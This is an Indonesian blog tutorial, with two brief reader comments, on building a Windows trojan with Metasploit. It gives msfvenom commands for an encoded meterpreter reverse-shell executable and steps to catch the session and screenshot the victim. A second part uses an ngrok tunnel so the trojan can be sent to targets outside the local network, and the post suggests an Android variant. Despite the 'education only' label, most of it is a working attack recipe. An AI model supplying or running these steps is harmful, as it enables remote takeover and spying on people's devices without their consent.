Halo gais, kembali lagi di Lingkup Tekno. Kali ini saya akan membagikan tutorial cara membuat TROJAN dengan tujuan edukasi saja ya. Tutorial kali ini akan saya jalankan menggunakan Virtual Box dengan OS Kalilinux.
Kenapa harus kalilinux? karena kalilinux mempunyai tool bawaan bernama metasploit. Tool inilah yang akan berfungsi untuk membuat TROJAN.
TROJAN sendiri merupakan jenis malware yang menyamar sebagai program. Jika target mengklik program tersebut, maka orang yang membuat TROJAN akan memiliki akses pada laptop/device target. Cukup bahaya bukan, untuk itu kali ini saya akan memberikan edukasi cara membuatnya agar kalian dapat mencegahnya di kemudian hari.
Di tutorial kali ini, saya akan membagikan dua tutorial. Yang pertama membuat TROJAN dan mengujinya di jaringan yang sama (lebih tepatnya di laptop yang sama). Yang kedua membuat TROJAN dan mengujinya di luar jaringan atau laptop target. Anyway, target uji kali ini menggunakan OS Windows ya guys.
Perlu diingat tutorial kali ini untuk edukasi saja ya guys. Untuk itu tidak perlu lagi lama, berikut adalah tutorialnya.
A. PERCOBAAN EXPLOIT TROJAN MENGGUNAKAN VIRTUAL BOX DALAM SATU JARINGAN ATAU DEVICE
1.
Pertama melakukan instalasi kalilinux pada Virtual Box. Disini saya sebelumnya sudah menginstall kalilinux dengan nama iso “kali-linux-2022.1-installer-amd64.iso”. Download
disini.
2. Setelah penginstalan kalilinux, ganti network virtualbox dengan Host-Only Adapter agar dapat terhubung dengan host windows.
3. Setelah itu jalankan kalilinux.
4. Buka aplikasi Metasploit framework pada menu Exploitation Tools kalilinux
5. Lalu buka terminal baru untuk mengecek ip kalilinux dengan perintah “ifconfig”. Disini ditemukan bahwa ip kalilinuxnya adalah 192.168.56.101
6. Lalu Kembali lagi ke terminal Metasploit, jika berhasil maka seperti ini tampilannya
7. Lalu buat payload untuk membuat file trojan dengan perintah seperti pada gambar dibawah ini. Pastikan bagian Ip address disesuaikan.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP_ADDRESS] LPORT=5555 -f exe -e x86/shikata_ga_nai -i 10 > hildhan.exe
8. File trojan yang telah dibuat, dikirim secara “drag and drop” pada host windows. Sebelumnya pastikan antivirusnya dimatikan terlebih dahulu
9. Lalu lakukan konfigurasi dibawah ini agar dapat terhubung pada target
10. Jika terlihat gambar seperti dibawah, berarti Metasploit sedang menunggu koneksi pada target
11. Selanjutnya pada host windows, buka aplikasi trojan yang telah dibuat oleh kalilinux
12. Jika berhasil maka akan seperti ini tampilannya
13. Ketik “help” untuk melihat command-command yang ada
14. Lalu ketik “screenshot” untuk memfoto layar terkini pada target
15. Berikut adalah buktinya
B. PERCOBAAN EXPLOIT TROJAN MENGGUNAKAN VIRTUAL BOX DENGAN NGROK
1. Pertama download dan install ngrok pada kalilinux. Ngrok disini merupakan aplikasi proxy server yang fungsinya nanti menghubungkan koneksi kalilinux dengan internet secara private melewate jaringan tunnel.
2. Oiya sebelumnya pada network kalilinux, ganti dari host-only ke NAT agar dapat terkoneksi internet
3. Setelah ngrok terinstall, jalankan “ngrok tcp 5555” agar membuat jaringan localhost ke port 5555 secara tcp
4. Jika berhasil maka akan terlihat seperti gambar dibawah ini
5. Lalu buat payload seperti sebelumnya dan lakukan beberapa konfigurasi seperti gambar diatas bawah ini. Pastikan bagian IP address dan Port disesuaikan dengan ngrok (forwarding).
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP_ADDRESS] LPORT=[PORT] -f exe -e x86/shikata_ga_nai -i 10 > trojan.exe
6. Lalu kirim trojan kepada target. Pastikan target memiliki OS Windows
7. Jika berhasil, maka tampilan payload akan seperti berikut
8. Dan ini adalah bukti jika trojan berhasil mengakses korban
Oke saya rasa itu saja guys yang bisa saya sampaikan. Kalian bisa mengotak atiknya sendiri dengan menggunakan command "help" di metasploitnya. Kalian sebenarnya juga bisa mengganti target uji dari windows ke android misalnya. Tinggal saat membuat payload ubah metepreternya dan nama filenya menjadi .apk.
Jika ada kebingungan silahkan komen ya guys. Insyaallah akan saya jawab. Thank you.
wih, makasih artikelnya gan. jadi makin tau Trojan
ReplyDeletemerci pour l'information 😺
ReplyDelete